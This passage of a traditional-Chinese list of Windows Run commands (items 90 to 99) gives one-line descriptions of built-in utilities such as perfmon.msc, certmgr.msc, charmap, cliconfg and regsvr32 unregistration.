90. packager-------對象包裝程序
91. perfmon.msc----計算機性能監測程序
92. charmap--------啟動字元映射表
93. cliconfg-------SQL SERVER 客戶端網路實用程序
94. Clipbrd--------剪貼板查看器
95. conf-----------啟動netmeeting
96. certmgr.msc----證書管理實用程序
97. regsvr32 /u *.dll----停止dll文件運行
98. regsvr32 /u zipfldr.dll------取消ZIP支持
99. cmd.exe--------CMD命令提示符